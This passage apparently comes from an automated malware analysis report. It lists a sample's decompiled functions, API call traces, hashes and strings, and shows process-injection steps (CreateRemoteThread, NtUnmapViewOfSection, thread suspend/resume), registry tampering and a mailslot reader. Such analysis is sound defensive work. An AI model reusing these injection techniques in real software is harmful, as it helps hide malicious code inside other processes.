						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1535, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61 Total matches: 2

Similarity

Total matches: 2
API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString
String ID: pnls
API String ID: 1759152104-141991303
Opcode ID: 1b851152067a6db6879b83e6b25959da6169a9d8602d5776354d9100e82b9d64
Instruction ID: c9f23dce73c85179fe8b2af871d3216cca9706f8479e6acea818e7f13d9a5d0a
Opcode Fuzzy Hash: C7E02B414545A2D794036880C3546C667839757705F0CE50181C6E49591E24747BFF48
Instruction Fuzzy Hash: c9f23dce73c85179fe8b2af871d3216cca9706f8479e6acea818e7f13d9a5d0a

APIs

RtlUpcaseUnicodeString.NTDLL(?,002E74CC,00000001), ref: 002E1561

Part of subcall function 002E1395: memset.NTDLL ref: 002E13B5
Part of subcall function 002E1395: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
Part of subcall function 002E1395: GetLastError.KERNEL32(00000001), ref: 002E1422
Part of subcall function 002E1395: HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E2427: OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
Part of subcall function 002E2427: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
Part of subcall function 002E2427: CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
Part of subcall function 002E2427: GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
Part of subcall function 002E2427: CloseHandle.KERNEL32(?), ref: 002E24E0
Part of subcall function 002E2427: GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

RtlFreeAnsiString.NTDLL(?), ref: 002E15DF

Strings

pnls, xrefs: 002E1579

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

